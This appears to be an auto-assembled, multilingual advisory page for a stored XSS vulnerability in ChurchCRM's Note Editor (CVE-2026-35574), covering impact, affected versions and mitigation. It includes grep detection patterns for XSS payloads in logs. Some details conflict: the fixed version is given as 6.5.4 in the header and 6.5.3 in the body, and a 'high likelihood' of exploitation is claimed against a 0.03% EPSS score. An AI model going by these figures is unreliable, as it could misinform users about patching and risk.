Plattform
php
Komponente
churchcrm
Behoben in
6.5.4
A stored Cross-Site Scripting (XSS) vulnerability has been identified in ChurchCRM versions 6.5.0 through 6.5.2. This flaw resides within the Note Editor and allows authenticated users possessing note-adding permissions to inject malicious JavaScript code. Successful exploitation can compromise other users' sessions, escalate privileges, and expose sensitive church member data. The vulnerability has been patched in version 6.5.3.
The impact of this XSS vulnerability is significant. An attacker could leverage it to execute arbitrary JavaScript code within the browsers of other ChurchCRM users, including administrators. This opens the door to various malicious activities, such as session hijacking, allowing the attacker to impersonate legitimate users. Furthermore, the attacker could potentially steal sensitive data, such as church member information, financial records, or other confidential details stored within the ChurchCRM system. The potential for privilege escalation is also present, as an attacker could gain access to administrative functions by hijacking an administrator's session.
This vulnerability was publicly disclosed on 2026-04-07. While no active exploitation campaigns have been publicly reported, the ease of exploitation associated with XSS vulnerabilities means it could be targeted. The vulnerability is not currently listed on CISA KEV. Public proof-of-concept exploits are likely to emerge given the nature of XSS vulnerabilities.
Churches and religious organizations utilizing ChurchCRM versions 6.5.0 through 6.5.2 are at direct risk. Organizations with shared hosting environments or those that have granted broad note-adding permissions to multiple users are particularly vulnerable, as the attack surface is increased.
• php: Examine ChurchCRM logs for suspicious JavaScript code being injected into notes. Search for unusual characters or patterns commonly associated with XSS payloads.
grep -i 'alert\(' /var/log/churchcrm/error.log• generic web: Monitor access logs for requests containing suspicious URL parameters or POST data that could be indicative of XSS attempts.
grep -i '<script' /var/log/apache2/access.logdisclosure
Exploit-Status
EPSS
0.03% (9% Perzentil)
CISA SSVC
CVSS-Vektor
The primary mitigation for CVE-2026-35574 is to immediately upgrade ChurchCRM to version 6.5.3 or later. If upgrading is not immediately feasible, consider implementing input validation and output encoding on the Note Editor to sanitize user-supplied data. Web Application Firewalls (WAFs) configured to detect and block XSS payloads can provide an additional layer of defense. Regularly review ChurchCRM configurations and user permissions to minimize the potential attack surface. After upgrading, confirm the fix by attempting to inject a simple JavaScript payload into the Note Editor and verifying that it is properly sanitized.
Actualice ChurchCRM a la versión 6.5.3 o posterior para mitigar la vulnerabilidad de XSS. Asegúrese de realizar una copia de seguridad de su base de datos antes de actualizar. Revise los registros de auditoría para detectar cualquier actividad sospechosa después de la actualización.
Schwachstellenanalysen und kritische Warnungen direkt in deinen Posteingang.
CVE-2026-35574 is a stored Cross-Site Scripting (XSS) vulnerability in ChurchCRM versions 6.5.0 through 6.5.2, allowing attackers to execute JavaScript code.
You are affected if you are running ChurchCRM versions 6.5.0, 6.5.1, or 6.5.2. Upgrade to 6.5.3 to mitigate the risk.
Upgrade ChurchCRM to version 6.5.3 or later. Implement input validation and output encoding as an interim measure.
While no active exploitation has been confirmed, the XSS nature of the vulnerability suggests a high likelihood of exploitation if left unpatched.
Refer to the ChurchCRM security advisories on their official website or GitHub repository for the latest information.
Lade deine Abhängigkeitsdatei hoch und erfahre sofort, ob dich diese und andere CVEs treffen.